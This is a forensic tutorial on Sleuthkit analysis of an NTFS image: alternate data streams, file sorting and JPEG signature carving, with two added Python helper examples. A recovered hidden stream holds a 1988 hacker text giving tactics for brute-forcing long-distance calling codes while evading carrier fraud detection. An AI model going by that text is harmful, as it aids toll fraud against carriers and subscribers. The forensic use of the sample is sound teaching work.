Both entries for SVstunts.avi have the same MFT record number and are identified as file data (137-128), but the attribute identifier increments by one (137-128-3 and 137-128-4) [22]. This is an example of an "Alternate Data Stream" (ADS). Accessing the standard contents (137-128-3) of SVstunts.avi is easy, since it is an allocated file. However, we can access either data stream, the normal data or the ADS, by using the Sleuthkit command icat, much as we did with the two file name types in our previous exercise. We simply call icat with the complete MFT record entry, to include the alternate attribute identifier. To view the contents of the ADS (137-128-4):
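The check just described (one MFT entry, two $DATA attribute identifiers) is easy to miss in a long fls listing, so here it is automated. This is an added example, not code from the original article or from The Sleuth Kit. Most sample lines are copied from the fls listings above; the two SVstunts.avi lines are constructed from the identifiers the text gives (137-128-3 and 137-128-4), and the stream name hidden_stream is a placeholder, since the page never names the real stream. The icat command that follows retrieves the flagged stream exactly as the text describes.

```python
"""Flag NTFS alternate data streams (ADS) in Sleuthkit `fls` output.

Added example, not code from the original article or from The Sleuth Kit.
An MFT entry that owns more than one $DATA attribute (type 128) is a file
with an ADS; this script groups fls lines by entry and reports such files."""
import re
from collections import defaultdict

NTFS_DATA_ATTR = 128  # $DATA attribute type, as printed by fls and istat

# fls line shape: "<dirtype>/<metatype> [*] <entry>[-<attrtype>-<attrid>]:<TAB><path>"
FLS_LINE = re.compile(
    r"^(?P<types>[-a-zA-Z]/[-a-zA-Z])\s+(?P<deleted>\*\s+)?"
    r"(?P<entry>\d+)(?:-(?P<atype>\d+)-(?P<aid>\d+))?:\s+(?P<path>.*)$"
)

PAGE_LINES = [  # copied from the fls output shown above
    "r/r 4-128-4:\t$AttrDef",
    "r/r 9-128-8:\t$Secure:$SDS",
    "r/r 9-144-11:\t$Secure:$SDH",
    "r/r 9-144-5:\t$Secure:$SII",
    "r/r 28-128-3:\tDesktop/dtrsetup.exe",
    "r/r 74-128-4:\tMy Documents/anon-mail.txt",
    "r/r * 42-128-1:\tCookies/buckyball@revsci[2].txt",
]
CONSTRUCTED_LINES = [  # constructed: ids from the text, stream name is a placeholder
    "r/r 137-128-3:\tSVstunts.avi",
    "r/r 137-128-4:\tSVstunts.avi:hidden_stream",
]
SAMPLE_FLS = "\n".join(PAGE_LINES + CONSTRUCTED_LINES) + "\n"


def parse_fls(text: str) -> list:
    """One dict per fls entry line; banners and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = FLS_LINE.match(line)
        if not m:
            continue
        rows.append({
            "entry": int(m["entry"]),
            "atype": int(m["atype"]) if m["atype"] else None,
            "aid": int(m["aid"]) if m["aid"] else None,
            "deleted": m["deleted"] is not None,  # fls marks deleted entries with "*"
            "path": m["path"],
        })
    return rows


def find_alternate_data_streams(text: str) -> list:
    """Return one finding per MFT entry that carries two or more $DATA attributes."""
    data_attrs = defaultdict(list)
    for row in parse_fls(text):
        if row["atype"] == NTFS_DATA_ATTR:
            data_attrs[row["entry"]].append(row)
    findings = []
    for entry, rows in sorted(data_attrs.items()):
        if len(rows) < 2:
            continue  # a single named stream such as $Secure:$SDS is not an ADS pair
        rows.sort(key=lambda r: r["aid"])
        findings.append({
            "entry": entry,
            "file": rows[0]["path"].split(":", 1)[0],
            "attribute_ids": [f"{entry}-{NTFS_DATA_ATTR}-{r['aid']}" for r in rows],
            "streams": [r["path"] for r in rows],
            "deleted": any(r["deleted"] for r in rows),
        })
    return findings


def sector_to_byte_offset(start_sector: int, sector_size: int = 512) -> int:
    """mmls reports partition starts in sectors; `mount -o offset=` wants bytes."""
    return start_sector * sector_size


if __name__ == "__main__":
    print("mount offset for sector 59:", sector_to_byte_offset(59))
    for hit in find_alternate_data_streams(SAMPLE_FLS):
        print(f"MFT entry {hit['entry']} ({hit['file']}) has {len(hit['streams'])} $DATA streams:",
              ", ".join(hit["attribute_ids"]))
```

Run against the real listing, feed it the full output of fls -Fr -o 59 -f ntfs ntfs_pract.dd instead of SAMPLE_FLS; each finding's attribute_ids are exactly the arguments to pass to icat, so the examiner can pull every stream rather than only the one the mounted view shows.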

root@bt:~/forensic# icat -o 59 -f ntfs ntfs_pract.dd 137-128-4

   <()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>
   /||                                                                    ||\
   \||                   P R O F E S S O R   F A L K E N ' S              ||/
   /||                                                                    ||\
   \||                               GUIDE TO                             ||/
   /||                                                                    ||\
   \||                      *****  *****  ****   *****                    ||/
   /||                      *   *  *   *  *   *  *                        ||\
   \||                      *      *   *  *   *  *****                    ||/
   /||                      *   *  *   *  *   *  *                        ||\
   \||                      *****  *****  ****   *****                    ||/
   /||                                            P {                    ||\
   \||                                                                    ||/
   /||                           HACKING  SECURITY                        ||\
   \||                                                             (C)1988||/
   <()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>


   First I'd like to thank the following people for thier contributions to this
file and to my knowledge about this fucking world--=->  Frye Guy, Laser,
David Lightman, HackerSoft in it's entirety, The Rebel, Digital Logic,
L.E. Pirate, Brain Tumor, Boris Crack, Mad Max, Sike III, The Blade,
Spartacus, Baby Eagle, Iceman/TOPGUN, Spam Master, & Codebuster.

   This file is meant for the beginner/novice/amateur code hacker.  Anyone
have been hacking for over 2 years you probably don't need to read.

   The first thing I would like to point out is the major LD companies security
systems. A couple years ago MCI and SPRINT installed a NEW type of ESS
which makes it easier to catch code hacks.  This system is able to detect
patterns on it's ports, such as one target number being repeated many times or
invalid codes repeating every x number of minutes.  They thought they were
smart, but we just have to be a step smarter.

MULTIPLE PORTS-->
   By having a code hacker that uses multiple port hacking ( that is one that
can hack many ports in one session ) you can lower the odds of being caught
tremendously.  By entering many ports into the hackers database and being able
to access them all in one session reduces the LD Co's ability to catch a
pattern on one of their port/s. With this feature you are able to throw the LD
company off WHERE and WHEN you will strike next. ALSO SEE TIMING PATTERNS.

MULTIPLE TARGETS-->
   The first of the (IBM) programs to have multiple targets was Terminus's
Codebuster, it was then implemented into The Brew Associate's Code Thief.  By
utilizing a program's multiple target option, the chances you being caught by
their system's pattern detection is almost NIL. Code Thief's multiple target
file contains 369 targets.  If you cannot get this target list I suggest you
compile a list of TELENET,COMPUSERVE, etc. dial ups and use them for targets.
At least you'll have a better chance...

PORT PATTERNS & TIMING PATTERNS-->
   Long distance companies like SPRINT/MCI usually have more than 1 port in
large cities/areacodes, thus you can hack on many of their ports.  Increasing
the number of ports you hack on gives you an edge. The LD's system will get
suspicious if it finds many invalid codes attempts on one of its port.  Each
port is allotted a certain amount of invalid codes attempts. If this number is
exceeded an error flag will go on and the security division will be alerted to
the port. So in other words by increasing the ports you can decrease your odds
of being alerted to and ANI'ed.

   As mentioned before the LD companies also have timing pattern recognition.
This means they can tell if they are getting an invalid code attempt every
x minutes. This really is the most deadly features of their system ( next to
ANI of course ) because almost every hacker I know of runs on a set amount of
time for each thing to happen. Carrier timeout,seconds to wait till code &
target are entered, all of these are on a fixed amount of time. Every so many
number of seconds the hacker repeats its invalid code timeout & retry time
almost exactly.  To get rid of this deadly feature is QUITE simple.
What I suggest is to add another port or two to your list.  However, this port
is special because its not a port at all.  It's a friend you hate or a
disconnected number or some business.  That way your timing for the LD's ports
will not stay predictable.  Also vary the carrier timeout value ( a.k.a.
timeout value ) for the fake port numbers.  Doing this will make you about as
unpredictable as nitroglycerine made from a T-File.

TIMES TO HACK-->
   When I first started code hacking 84' I thought the best time to hack was
at 2 a.m. because there wouldn't be anybody at the L.D. company then.  Well
maybe back then there wasn't because there wasn't any customer service after
6pm. But the times have changed.  There is security and customer service and
maintenance there 24 hours a day 7 days a week- Even Holidays.  So the best
time to hack would be when normal customers are using it.  Most customers are
either business's or households.  So your best bet would be hacking when they
would use it- M-F 8am to 7pm.  This is when most people accidently fuck-up on
their code and thus it is the best time to hack.  I would suggest hacking in
the morning since the LD's system is counting the number of invalid attempts
if you do a lot in the morning then the subscribers in the afternoon will get
get evil eye, not you.  Usually the LD companies system RESETS its value at
12:00 midnight so that the invalid attempt numbers don't keep adding on the
the previous days.  Also hacking on holidays such as Christmas is excellent
because the amount of people calling everyone all over the fucking place is
magnanimous.

IBM HACK PROGRAMS-->
   I have an IBM and I use Code Thief Version 2.2 which can be found on almost
any good phreak/pirate BBS around.  Most of the code hacker's I have run into
either didn't work on my system because 1> The programmer didn't BETA test the
program totally. 2> The programmer didn't know what the fuck he was doing.
3> The program had so little features that you're bound to be caught using it.
The best program I've found was Code Thief Version 2.2 I have looked over:
Fuckin Hacker 2.0- It didn't work properly on IBM PC (Possibly fucked ARC)
All-In-One Hacker- Not enough features/Parts of program fucked up.
Codebuster- Couldn't get it to work with my modem ( HAYES 1200B )
AutoHack- Not enough features.

NEW PRODUCTS-->
Be on the look out for INTEL-Hack. This hacker is somewhat secret right now,
but I'll tell you it will have all the features of Code Thief but it will take
advantage of the 80386's multitasking capabilities.  Lookout it should be
killer, release date: Not yet planned, 89' sometime.
Later, and I hope this shed some insight on how to keep yourself safe...- Professor Falken

root@bt:~/forensic# mkdir sort_out
root@bt:~/forensic# sorter -d ./sort_out -md5 -h -s -o 59 -f ntfs ntfs_pract.dd

Analyzing  "ntfs_pract.dd"
  Loading Allocated File Listing
  Processing 133 Allocated Files and Directories
  100%
All files have been saved to: ./sort_out

root@bt:~/forensic# ls sort_out/
archive       audio.html  disk       documents.html  images       mismatch.html  text
archive.html  data        disk.html  exec            images.html  system         text.html
audio         data.html   documents  exec.html       index.html   system.html    unknown.html

Look in the file:

Signature Search in Unallocated Space


Now let's do the same sort of unallocated analysis we did in Exercise #3,
but this time instead of searching for text data, we will look for file signatures.
This will give us an opportunity to introduce another useful Sleuthkit tool,
sigfind.
For this particular exercise, we'll use the NTFS image we used
previously, ntfs_pract.dd. Change to the directory containing that image and
let's begin.
As always, we start with mmls to help us identify the offset of the file
system within the image that we are interested in:

root@bt:~# cd /root/forensic/
root@bt:~/forensic# ls
evid  ntfs_pract.dd  Rby  sort_out

root@bt:~/forensic# mmls ntfs_pract.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000000058   0000000059   Unallocated
02:  00:00   0000000059   0001023059   0001023001   NTFS (0x07)
03:  -----   0001023060   0001023999   0000000940   Unallocated

Here we want to study the unallocated data from the NTFS file system at
sector offset 59. So we issue our blkls command and redirect the output to
another file:

root@bt:~/forensic# blk
blkcalc  blkcat   blkid    blkls    blkstat

root@bt:~/forensic# blkls -o 59 ntfs_pract.dd > ntfs_pract.blkls
root@bt:~/forensic# ls -lh
total 978M
drwxr-xr-x  2 root root 4.0K 2012-10-31 00:07 evid
-rw-r--r--  1 root root 478M 2012-11-01 23:52 ntfs_pract.blkls
-rwxr-xr-x  1 root root 500M 2007-10-23 01:28 ntfs_pract.dd
drwxr-xr-x  2 root root 4.0K 2012-10-31 17:16 Rby
drwxr-xr-x 11 root root 4.0K 2012-11-01 21:39 sort_out

Once again, the output file is arbitrarily named. I give it a .blkls
extension for the sake of simplicity. Now, let's go ahead and search the
unallocated image we created for JPEG images. We use these JPEG picture files
for our example because most experienced forensic examiners are familiar with
the signatures.
For example, the man page for sigfind gives the example of searching for
a boot sector signature with the command:

root@bt:~/forensic# sigfind -o 510 -l AA55 ntfs_pract.dd
Block size: 512  Offset: 510  Signature: 55AA
Block: 0 (-)
Block: 59 (+59)
Block: 492076 (+492017)
Block: 1023059 (+530983)
error reading bytes 1024000
In this case, the block size is the default 512 (no -b option is given). The -o 510 tells sigfind to look for the signature 510 bytes into every sector it searches. The -l option refers to the endian ordering of the signature: the bytes given as AA55 are searched in reversed order, which is why the output reports the signature as 55AA.

Back to our exercise at hand... We must also keep in mind that sigfind
takes hex as its signature string, so unlike grep, we cannot simply search for
"JFIF". We need to convert the ASCII string to hex. This is easily done by
echoing the string to xxd with the -p option (continuous or "plain" dump):

root@bt:~/forensic# echo -n JFIF | xxd -p
4a464946
Also note in the above command, we use the -n option to echo to
prevent a newline character from being passed to xxd as well. The hex
signature we are going to search for is 4A464946 ("JFIF").
We can now do our sigfind command.

root@bt:~/forensic# sigfind -b 4096 -o 6 4A464946 ntfs_pract.dd
Block size: 4096  Offset: 6  Signature: 4A464946
error reading bytes 128000

root@bt:~/forensic# sigfind -b 4096 -o 6 4A464946 ntfs_pract.blkls
Block size: 4096  Offset: 6  Signature: 4A464946
Block: 57539 (-)                                                                                                 
Block: 57582 (+43)
error reading bytes 122238
The command above shows us running sigfind with a block size (-b)
of 4096 (from fsstat output), an offset (-o)
of 6, and a signature of 4A464946 on the extracted unallocated space ntfs_pract.blkls.
As you can see, we come up with two hits. Now we use the blkcalc
command to determine the block address of the unallocated block in the
original image:

root@bt:~/forensic# blkcalc -o 59 -u 57539 ntfs_pract.dd
60533
Above, we called blkcalc with -u 57539 to indicate that we are passing an address from an unallocated image produced by blkls. The file system this unallocated block was extracted from is in our ntfs_pract.dd image at sector offset 59. The result shows us that unallocated block 57539 in our blkls image maps to data block 60533 in the original file system.
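To make the block arithmetic behind the sigfind and blkcalc steps above concrete (including the -l byte-reversal from the boot-sector example), here is an added example that re-implements both on a constructed in-memory file system. It is not code from the original exercise or from The Sleuth Kit; the 8-block image, its allocation map and the JFIF blocks are all constructed.

```python
"""Added example, not from the exercise or from The Sleuth Kit: a minimal
sigfind / blkls / blkcalc -u on a constructed in-memory file system."""

BLOCK = 4096  # cluster size reported by fsstat on the page


def ascii_to_hex(s: str) -> str:
    """Same result as `echo -n <s> | xxd -p`."""
    return s.encode("ascii").hex()


def sigfind(data: bytes, sig_hex: str, block_size: int = 512,
            offset: int = 0, little_endian: bool = False) -> list[int]:
    """Block numbers where sig_hex occurs `offset` bytes into the block.
    little_endian mirrors -l: the signature bytes are reversed before the
    search, so AA55 is actually searched as 55AA."""
    sig = bytes.fromhex(sig_hex)
    if little_endian:
        sig = sig[::-1]
    hits = []
    for blk in range(len(data) // block_size):
        start = blk * block_size + offset
        if data[start:start + len(sig)] == sig:
            hits.append(blk)
    return hits


def blkls(blocks: list[bytes], allocated: list[bool]) -> tuple[bytes, list[int]]:
    """Concatenate the unallocated blocks in order, as blkls does, and keep
    the original block number of each (the mapping blkcalc -u recovers)."""
    unalloc = [i for i, a in enumerate(allocated) if not a]
    return b"".join(blocks[i] for i in unalloc), unalloc


def blkcalc_u(unalloc_map: list[int], blkls_block: int) -> int:
    """blkcalc -u: blkls-image block address -> original file-system block."""
    return unalloc_map[blkls_block]


def demo() -> list[tuple[int, int]]:
    """Constructed image: JFIF headers in blocks 0, 3 and 6. Block 0 is
    allocated, so it must not appear in the blkls image; 3 and 6 are deleted
    files and should be found and mapped back to their original addresses."""
    jfif_block = b"\xff\xd8\xff\xe0\x00\x10" + b"JFIF" + bytes(BLOCK - 10)
    blocks = [jfif_block if i in (0, 3, 6) else bytes(BLOCK) for i in range(8)]
    allocated = [True, True, False, False, True, False, False, True]
    image, unalloc_map = blkls(blocks, allocated)
    sig = ascii_to_hex("JFIF").upper()               # '4A464946', as on the page
    hits = sigfind(image, sig, block_size=BLOCK, offset=6)
    return [(h, blkcalc_u(unalloc_map, h)) for h in hits]  # [(1, 3), (3, 6)]
```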
Now that we have the data block (60533) in the original file system, we
can use ifind to identify the meta data structure that is assigned to that data
block. In this case the meta data structure is an MFT entry, since we are
working with an NTFS file system:

root@bt:~/forensic# ifind -o 59 -d 60533 ntfs_pract.dd
112-128-4
The MFT entry is 112-128-4 or simply 112 (the 128-4 portion denotes
the $DATA attribute identifier). We can use ffind to determine the file name
that holds (or held) that particular MFT entry. Be very careful of interpretation here. As always, you need to have a firm grip on how the file system works before deciding that the information being presented is accurate, depending on the file system being examined.

root@bt:~/forensic# ffind -o 59 ntfs_pract.dd 112
* /My Documents/My Pictures/bandit-streetortrack2005056.jpg
Recovering the deleted file using icat and piping the results to the file
command indicates that we have found a JPEG image, which the previous ffind command indicated may have been called bandit-streetortrack2005056.jpg.

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112 | file-
No command 'file-' found, did you mean:
 Command 'file2' from package 'file-kanji' (universe)
 Command 'filep' from package 'mp' (universe)
 Command 'file' from package 'file' (main)
file-: command not found

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112 | file -
/dev/stdin: JPEG image data, JFIF standard 1.02
Recall now our original sigfind output:

root@bt:~/forensic# sigfind -b 4096 -o 6 4A464946 ntfs_pract.blkls
Block size: 4096  Offset: 6  Signature: 4A464946
Block: 57539 (-)
Block: 57582 (+43)

root@bt:~/forensic# blkcalc -u 57582 -o 59 ntfs_pract.dd
60662
root@bt:~/forensic# ifind -o 59 -d 60662 ntfs_pract.dd
116-128-4

root@bt:~/forensic# ffind -o 59 ntfs_pract.dd 116
* /My Documents/My Pictures/fighterama2005-ban4.jpg

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 116 | file -
/dev/stdin: JPEG image data, JFIF standard 1.01
We have another JPEG, this one at MFT entry 116, and named
fighterama2005-ban4.jpg.

We can actually recover both files by using icat and redirecting to new
files. I've named the files by their MFT entry and the .jpg extension, since the file command confirmed that's what they are:

root@bt:~/forensic# icat -o ntfs_pract.dd 112 > 112.jpg
Invalid image offset (tsk_parse: invalid image offset: ntfs_pract.dd)

root@bt:~/forensic# icat -o ntfs_pract.dd 116 > 116.jpg
Invalid image offset (tsk_parse: invalid image offset: ntfs_pract.dd)

You can now view the files with any graphics viewer you might have
available. For example, you can use the display command

root@bt:~/forensic# display 112.jpg
display: Empty input file `112.jpg' @ jpeg.c/EmitMessage/232.